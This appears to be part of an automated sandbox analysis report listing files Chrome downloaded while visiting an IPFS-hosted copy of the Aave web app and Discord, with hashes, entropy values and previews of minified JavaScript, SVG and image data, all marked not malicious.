                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/7888.4670beb870221fb5.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7888],{47130:function(e,t,r){r.d(t,{X:function(){return c}});var n=r(30120),o=r(90149),i=(r(67294),r(73965)),s=r(38776),a=r(85893),c=function(e){var t=e.children,r=(0,i.HT)(),c=r.user;return r.loading?(0,a.jsx)(n.Z,{sx:{width:"100%",display:"flex",alignItems:"center",justifyContent:"center"},children:(0,a.jsx)(o.Z,{})}):((0,s.Z)(c,"User data loaded but no user found"),(0,a.jsx)(a.Fragment,{children:t(c)}))}},29002:function(e,t,r){r.d(t,{o:function(){return u}});var n=r(59499),o=r(4730),i=r(81645),s=r(85893),a=["sx"];function c(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function l(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?c(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):71691
                                                                                                                                                                                                                                                  Entropy (8bit):5.290566318478528
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:O2uB0DdnFpVMQfuhkGT0iCfWXRFGY+9Ti:OAVm6GT0BuhFSTi
                                                                                                                                                                                                                                                  MD5:9612DEE64A8F3AD04BC68825DE164872
                                                                                                                                                                                                                                                  SHA1:A209961210B29D86F200EB7F70550EF2BFF17EF5
                                                                                                                                                                                                                                                  SHA-256:B18A7EC622A23BDDD75CA937CDD0DFA384F3AA1C5D276CBFAB59776F77CAAA1B
                                                                                                                                                                                                                                                  SHA-512:7D097E25A903F850A5A627842C377ECE5B270D9AF40237A6AECFD9E232BB9856BF6AE5AEF62236790BEBC2576E1F53245DFD66AD6DE08E3E05DD5D7BA6BB97BE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3662],{96486:function(n,t,r){var e;n=r.nmd(n),function(){var u,i="Expected a function",o="__lodash_hash_undefined__",f="__lodash_placeholder__",a=16,c=32,l=64,s=128,h=256,p=1/0,v=9007199254740991,_=NaN,g=4294967295,y=[["ary",s],["bind",1],["bindKey",2],["curry",8],["curryRight",a],["flip",512],["partial",c],["partialRight",l],["rearg",h]],d="[object Arguments]",b="[object Array]",w="[object Boolean]",m="[object Date]",x="[object Error]",j="[object Function]",A="[object GeneratorFunction]",k="[object Map]",O="[object Number]",I="[object Object]",E="[object Promise]",R="[object RegExp]",z="[object Set]",S="[object String]",C="[object Symbol]",W="[object WeakMap]",L="[object ArrayBuffer]",U="[object DataView]",B="[object Float32Array]",T="[object Float64Array]",$="[object Int8Array]",D="[object Int16Array]",N="[object Int32Array]",M="[object Uint8Array]",F="[object Uint8ClampedArray]",P="[object Uint16Array]",q="[object Uint32Array]
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9309)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):9358
                                                                                                                                                                                                                                                  Entropy (8bit):5.630138877286959
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:fcLtSa9QY4Cg9OHfMp1tOxyoZA0abcKPqO2Lk2mMATwJDxnE7LoH:6WCQyfMLteyoZA0abcKPqO2Lp+wJDxEg
                                                                                                                                                                                                                                                  MD5:339EFF57636A4A9033F4B2D6C2EC64CD
                                                                                                                                                                                                                                                  SHA1:BA1227A68F5F148A100744EAF4EDD3DD101529C7
                                                                                                                                                                                                                                                  SHA-256:461EC7B3D2270EA876CD375CF1BD201BB08C05FD0B96BBC2091E71A546FD440B
                                                                                                                                                                                                                                                  SHA-512:15207A31BBE6BB20EFEED8D3870ED51219FB3B255F6977026A52A6DF05EDBED10C23D3F90BAF2299E412AF7828D8206BEFD93644868729E57F365387140A2F03
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/be6659ffbe2faab6ce6f.js
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["4775"],{292824:function(t){t.exports="/assets/00fe8a6557e204eb9503.svg"},231239:function(t,e,n){var r=n(990547),i=n(283693),l=n(570140),u=n(573261),o=n(981631);e.Z={signup:(t,e)=>u.Z.post({url:o.ANM.HUB_WAITLIST_SIGNUP,body:{email:t,school:e},trackedActionData:{event:r.NetworkActionNames.HUB_WAITLIST_SIGNUP,properties:t=>{var e;let n=!1,r=null==t?void 0:null===(e=t.body)||void 0===e?void 0:e.email_domain;return null!=r&&(n=-1!==r.split(".").indexOf("edu")),(0,i.iG)({is_edu_email:n})}}}),sendVerificationEmail:async(t,e,n)=>(await u.Z.post({url:o.ANM.HUB_EMAIL_VERIFY_SEND,body:{email:t,guild_id:n,allow_multiple_guilds:e,use_verification_code:!0},trackedActionData:{event:r.NetworkActionNames.HUB_EMAIL_VERIFY_SEND,properties:t=>{var e;let n=null==t?void 0:null===(e=t.body)||void 0===e?void 0:e.has_matching_guild;return(0,i.iG)({has_matching_guild:n})}}})).body,async verify(t){if(null!=t)try{var e;let n=awa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17914), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):17914
                                                                                                                                                                                                                                                  Entropy (8bit):5.436094018399114
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:I9b8LprlVPUyFMq4BAyS4YSfCpn6MXvIrMB4r/5Xr2U8+5k70mSpDdqAtCFXWE1v:1BfiGxhwC5B4tARFmKkJ17o
                                                                                                                                                                                                                                                  MD5:97443182BB670D5C959DDBFDE1432F53
                                                                                                                                                                                                                                                  SHA1:A3E9A77E26378F034314AF8759194075019B22F8
                                                                                                                                                                                                                                                  SHA-256:CACC70665C0AE3428A22DB452A94E1E3790C1E944D8816E1D0BCC77AD2CA198C
                                                                                                                                                                                                                                                  SHA-512:137A6F5B37CAC9B05DC2E7EC93971188E7B91C2F01A7B9E6AC90002B61221AB9565B8A7C0C9E14541AA2082DAA14E4480E61934514F8EFEFF114E89A58DF68B6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/4254-ac0dd33f5ae839d3.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4254],{35643:function(e,t,r){r.d(t,{g:function(){return G}});var n=r(80854),a=r(1279),i=r(62753),s=r(9144),o=r(30120),c=r(90149),u=r(56371),l=r(67294),d=r(59499),p=r(36864),f=r(49501),v=r(57609),x=r(58527),h=r(85893);function b(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function g(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?b(Object(r),!0).forEach((function(t){(0,d.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):b(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var m=function(e){var t=(0,p.Z)({},e);return(0,h.jsx)(x.G,g(g({event:{eventName:v.vh.TOOL_TIP,eventParams:{tooltip:"Gas Calc"}}},t),
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):6321
                                                                                                                                                                                                                                                  Entropy (8bit):6.047618250834545
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:tg7mZhXeov6Vn6OPbhEQhUrZ6/947vjWLfCcEoQ+6Ny1QXLR1KXkVmks232YvvO0:QmZV6VdhEFkl4hn3XXKXkVzGYvvy0xfV
                                                                                                                                                                                                                                                  MD5:19B416D849CAB8E380747A535A5FFDC6
                                                                                                                                                                                                                                                  SHA1:DEAE4F450EBAE10FB8609D1E70F5AF9201D743F8
                                                                                                                                                                                                                                                  SHA-256:1BACF67CF153ED11DF37509111E853B92C09E2F15AE25D3052A3B550E87EE7C8
                                                                                                                                                                                                                                                  SHA-512:CE8383CA8F9213752D0CCC1CBCDF736C704CB1CFF86457B6D872A4FF67124651FA99AA25E3D07167FACE1077BFCA662D667C35115467404F0C3A9F5CACAC83AF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg width="24" height="24" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path fill="url(#a)" d="M0 0h24v24H0z"/><defs><pattern id="a" patternContentUnits="objectBoundingBox" width="1" height="1"><use xlink:href="#b" transform="scale(.00781)"/></pattern><image id="b" width="128" height="128" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAACACAYAAADDPmHLAAARKElEQVR4Ae1d25MVxRnfsiyfQlVe4pOW+SOsSl7iQ3xK+T/EqjOrIRgTk4gxamZmYcFdUAGRmyKieFlcYFVEWVdAkYsYvKEhSoJYUauge86eZZc9sLtwOvXrs8POmTPT3XM7070yVafOXHt6vt+vv758X3/d1TUPt/vc2k/vXuL9otv1ftvteMsqDt1escneikMOV2xyouKQMxWbeBWHTvEf3+fncA337MUzeBZpIC2kOQ9FZf4nLXLZT+7qIb+xHLrSsunBikPOVWzCCvk55BzegXfhnXi3+RI07Atcl93Q7Xq/tlyv17LJEcuhM4WArUAivJvnwfV6kSfkzTBxmpPdbrf6S8sh6yyHVssCXPZe5A15RF7NkazGOV3o1n5uueQRy6Ffy4Sv23XkGXnHN2gsYj2zVnHprZZDhyo2begGbPL80Ab/Fpfeqqe0NcpV9xLyK8shw8mFXFCjT6EdkCSv+DZ8o0Yi1yMrVo93O2/B5yzwJOB08l7ek+jxbtdD+iXmotut3lRxyGAnha/VuxwyCBmUCEE5r3Zddr3l0vsth0xoBUgJGggygCwgk3LQ6PBb
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (34035), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):34035
                                                                                                                                                                                                                                                  Entropy (8bit):5.45683293617562
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:knedWIxaY317y9J99yHCikU07Lq8anawf59Gq5n0Zzg9ffbNabNA:zd3G9J99yHCikpBaFf59Gm05g93hahA
                                                                                                                                                                                                                                                  MD5:AECC04844654567A03351C63FD7CA85F
                                                                                                                                                                                                                                                  SHA1:AFC31A40013EBFB721E43B2DB2BC7AD7DEA5E017
                                                                                                                                                                                                                                                  SHA-256:2DF57BA0E64B13AB4CCD34B721A09FE19992BCAAA8E6F6B26A1FDBA704C813BA
                                                                                                                                                                                                                                                  SHA-512:FEE7DF961170289BD3F9CA2F0AA2B874B78DCBBEFD1875553705CF210369E8B7167342EAE05FE5943903D923A6BE798F70AFDE46B6927664DFD70717A5BB2C57
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3866],{50020:function(e,r,t){var n=t(59499),o=t(4730),a=t(91655),i=t(30120),s=t(29630),c=(t(67294),t(73965)),l=t(41024),u=t(85893),d=["minVal","maxVal","percentVariant","hyphenVariant"];function p(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);r&&(n=n.filter((function(r){return Object.getOwnPropertyDescriptor(e,r).enumerable}))),t.push.apply(t,n)}return t}function x(e){for(var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r%2?p(Object(t),!0).forEach((function(r){(0,n.Z)(e,r,t[r])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):p(Object(t)).forEach((function(r){Object.defineProperty(e,r,Object.getOwnPropertyDescriptor(t,r))}))}return e}r.Z=function(e){var r=e.minVal,t=e.maxVal,n=e.percentVariant,p=e.hyphenVariant,m=(0,o.Z)(e,d),v=(0,c.HT)(),b=v.ghoLoadingData,h=v.ghoReserveData;if(b)return(0,u.js
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (40091), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):40091
                                                                                                                                                                                                                                                  Entropy (8bit):5.484135629228316
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:iKMmrRhCsKj+v2ZJ26HRQKiKpSrFkSTDKIv84h5:fRhCB+vWHFiXySTDKW8Y
                                                                                                                                                                                                                                                  MD5:6150BD14D567B050D48974E4BDAF2CCC
                                                                                                                                                                                                                                                  SHA1:0847A13C2755655F74D3D5770946DF3EC746CFA9
                                                                                                                                                                                                                                                  SHA-256:8B303BF90BD9BA561D01E253F1D65A74276BEDAB400B29DE736BD79959E21464
                                                                                                                                                                                                                                                  SHA-512:03A2E91A41DEAF775565949819C782845FDA785C74795D7A0C885F6163FE00376E078CE8AC2EDF3D67616657DDDEA550E824B2894A894EB6BCCC5E94A30B03C3
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/4423.ed6f3ef6bf1f44f5.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4423],{50020:function(e,r,t){var n=t(59499),o=t(4730),a=t(91655),i=t(30120),s=t(29630),l=(t(67294),t(46839)),c=t(41024),u=t(85893),d=["minVal","maxVal","percentVariant","hyphenVariant"];function p(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);r&&(n=n.filter((function(r){return Object.getOwnPropertyDescriptor(e,r).enumerable}))),t.push.apply(t,n)}return t}function x(e){for(var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r%2?p(Object(t),!0).forEach((function(r){(0,n.Z)(e,r,t[r])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):p(Object(t)).forEach((function(r){Object.defineProperty(e,r,Object.getOwnPropertyDescriptor(t,r))}))}return e}r.Z=function(e){var r=e.minVal,t=e.maxVal,n=e.percentVariant,p=e.hyphenVariant,m=(0,o.Z)(e,d),b=(0,l.HT)(),v=b.ghoLoadingData,h=b.ghoReserveData;if(v)return(0,u.js
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (35657), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):35657
                                                                                                                                                                                                                                                  Entropy (8bit):5.531416777373343
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:xyPr8VecZUKpzDKYazC4cdIiYStZwhUAkxCNO6LL7aZMEE0RIGM:5eDIflHZUUAjBP7aZMEE0R4
                                                                                                                                                                                                                                                  MD5:C53EE617F66EE2D319C91E2F6AFF7084
                                                                                                                                                                                                                                                  SHA1:45703BF3C5518E7FECC2251446FAA0FB9166A5C9
                                                                                                                                                                                                                                                  SHA-256:F84830A12C267FE7E71A72C0BBB06A286A3DD5AC3920A10851AE4EDD972BEEDA
                                                                                                                                                                                                                                                  SHA-512:AC9E9585021FCA606EC4AD3F112C85F505C47912903863774320A77E3493B3983CDB8A868D9D27D1ABF132938572374203011998B66DB82C59E2415BB4B17C57
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9421],{62753:function(e,t,n){var r=n(64836);t.Z=void 0;var a=r(n(64938)),o=n(85893),s=(0,a.default)((0,o.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=s},29002:function(e,t,n){n.d(t,{o:function(){return d}});var r=n(59499),a=n(4730),o=n(81645),s=n(85893),i=["sx"];function c(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function l(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{}
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2701)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2750
                                                                                                                                                                                                                                                  Entropy (8bit):5.460366645013334
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:F0fzk02vWrc1AKTMSTEcr9rTOLBsmPBo/6XgpdgwrIsi5dEk+MQwq2kWkGRv6hvr:ek02hfMXcKs+lXyisi5CkiPrWk+Ch/Ew
                                                                                                                                                                                                                                                  MD5:390A7AB1F964AA8CB1B87DD13732C3BC
                                                                                                                                                                                                                                                  SHA1:CEA52AC6FA0CDF49A18D51C8CD8A5C4FB52DEAC9
                                                                                                                                                                                                                                                  SHA-256:BEDD382930BA4E10DFA902BF833195911F82E754223441446E9D7CC45B01110F
                                                                                                                                                                                                                                                  SHA-512:4B799488E35C5B933E9B1BA6AB335E2EAD6D625D3DC1FEC19DD80F48B9B7996171BEC24513095F3F1BAA9C8B7675FA4E527B763AEED26B69273BF2DCED014D3F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var t={137920:function(t,r,n){var e,i;n.d(r,{J:function(){return u},z:function(){return e}}),(i=e||(e={}))[i.NONE=0]="NONE",i[i.SOCIAL=1]="SOCIAL",i[i.CASUAL=2]="CASUAL",i[i.COMPETITIVE=3]="COMPETITIVE",i[i.CREATIVE=4]="CREATIVE",i[i.VERY_HARDCORE=5]="VERY_HARDCORE";let u={0:"NONE",4:"NONE",1:"CASUAL",2:"CASUAL",3:"COMPETITIVE",5:"COMPETITIVE"}},945124:function(t,r,n){n.d(r,{y:function(){return i}});var e=n(137920);function i(t,r){let n=0;return null!=r.games&&(n+=2*r.games.filter(r=>t.games.includes(r)).length),null!=r.playstyle&&(r.playstyle===t.playstyle?n+=2:e.J[t.playstyle]===e.J[r.playstyle]&&(n+=1)),null!=r.traits&&(n+=2*Array.from(r.traits).filter(r=>t.traits.includes(r)).length),n}},866762:function(t,r,n){n(312677);var e=n(945124);self.addEventListener("message",t=>{var r,n;let{data:{unsortedClans:i,id:u,criteria:o}}=t;let a=(r=i,n=o,r.map(t=>({...t,affinity:(0,e.y)(t,n)})).sort((t,r)=>{var i,u;let o=null!==(i=r.affinity)&&void 0!==i?i:(0,e.y)(r,n);return o-
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x870, components 3
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):27722
                                                                                                                                                                                                                                                  Entropy (8bit):5.832908095467153
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:LGWKaOOlN9NVYqK5uj8N9HnsJoD0WDwBnC4SS4V0EkoJ8whr6wSbZNm9952UKQa:qZoNG48XHVD3DKnCEk6a8FZE9dKQa
                                                                                                                                                                                                                                                  MD5:706626DC94A67F26D258B4BB09FE9BCD
                                                                                                                                                                                                                                                  SHA1:E005D88D202410D848AF817EE9971F8659F03D90
                                                                                                                                                                                                                                                  SHA-256:3D152CAB7A5748D4BF246F49B4066C9288B294EF0DCF8BCC588FECCD803FE7AF
                                                                                                                                                                                                                                                  SHA-512:8AE38F07ED05D7DD26D0216C3704B737E02D444CFA1B90C853CCCE9534BC7B3C58E14CA0884423A022EBA0609A07A3C44BAB99D4B0719AE9228B8359F53B1550
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......f...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...hVz.....H.(.%..#w$...V..W.F**.c...).QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..V^...x.N...%/..R.....jQJQRV{.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):24
                                                                                                                                                                                                                                                  Entropy (8bit):4.022055208874201
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:PaniAKp18n:SnT
                                                                                                                                                                                                                                                  MD5:5DFB17ADA137F27939246A24FD5F7CE1
                                                                                                                                                                                                                                                  SHA1:6748CBADBAAA9216F6FC0C3C3B5F7CA786F3C8BA
                                                                                                                                                                                                                                                  SHA-256:E7E1364442A162805292D9693D57C84E66D37E27849E1EDC4C31A3436DEDF238
                                                                                                                                                                                                                                                  SHA-512:70A38493813CA097B394743E6ED33B2574079F500E5D9C911A8EC251E39C5BA47EC41214EE47B21BEF4D4392B2F3D507717282C2AE073A05FEC74542A2460F5D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnjkqJiyOoN-BIFDfwdehA=?alt=proto
                                                                                                                                                                                                                                                  Preview:Cg4KDA38HXoQGgUIoAEYAg==
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11489), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):11489
                                                                                                                                                                                                                                                  Entropy (8bit):5.357635242214589
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:zfvhkY1uywiNqMZA0lCwPW+2YE8V6jBb/KLnRnJh9:luANSgVABb/KLnRnJh9
                                                                                                                                                                                                                                                  MD5:2A1E2B7606A6A7EB12CE1FF4CB99C1F2
                                                                                                                                                                                                                                                  SHA1:D36151814366F1F6C31FF2BFCD2A2AB34CF69641
                                                                                                                                                                                                                                                  SHA-256:F05022051B22E29DB2C0294EAB0B143C5BAA75DBD9A2A2D7498C24B65056C991
                                                                                                                                                                                                                                                  SHA-512:9B631C70FA74054CF8812DF710D50DBC42E67E55DB0FED42ACDA66636C1FC285F4BE7A52698979C254FDAEAFA7BA39D542DDE0A042F65DED81D04EC9B7DE1972
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6211],{99730:function(e,r,t){t.d(r,{f:function(){return c}});var n=t(49501),a=t(30120),o=t(29630),i=t(69331),s=t(67916),u=t(85893),c=function(e){var r=e.txError;return(0,u.jsxs)(a.Z,{children:[(0,u.jsx)(s.Q,{txError:r}),"MetaMask Message Signature: User denied message signature."!==r.rawError.message&&"MetaMask Tx Signature: User denied transaction signature."!==r.rawError.message&&(0,u.jsx)(a.Z,{sx:{pt:4},children:(0,u.jsx)(i.v,{severity:"info",children:(0,u.jsxs)(o.Z,{variant:"description",children:[" ",(0,u.jsx)(n.cC,{id:"Tip: Try increasing slippage or reduce input amount"})]})})})]})}},21732:function(e,r,t){t.d(r,{P:function(){return T}});var n=t(90116),a=t(59499),o=t(50029),i=t(87794),s=t.n(i),u=t(75331),c=t(85945),l=t(67294),d=t(74119),f=t(8195),h=t(77537),p=t(78371),v=t(32113),m=t(39771),y=t(31001),x=t(89291);function g(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymb
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):203708
                                                                                                                                                                                                                                                  Entropy (8bit):3.826088104351986
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:zPgKNNJN86P5X208vLO9GINgxZhrRd51AlKDNXyadBYcOwg2oe6SeKqKTiq7Iq35:LgK/T5m7jajNgnh2eXOXrhqx8rzniowx
                                                                                                                                                                                                                                                  MD5:37EC3238EE9D47F7F0BFADE3868709E3
                                                                                                                                                                                                                                                  SHA1:D215C949078205B0CD56AB51CB519AFFB98F3D13
                                                                                                                                                                                                                                                  SHA-256:222B4FF6D02318E891A67E42E635897578F703C87F958C4C1D64FDB45D5550C5
                                                                                                                                                                                                                                                  SHA-512:EF213F8EDDF6165ED892EA3B8C51DA649CB478D7F6EBE67C0E6B36265716F519347BA218F41749120D50DE2D473B35203A10117B4701F514D7F0673436C76F21
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/icons/flags/es.svg
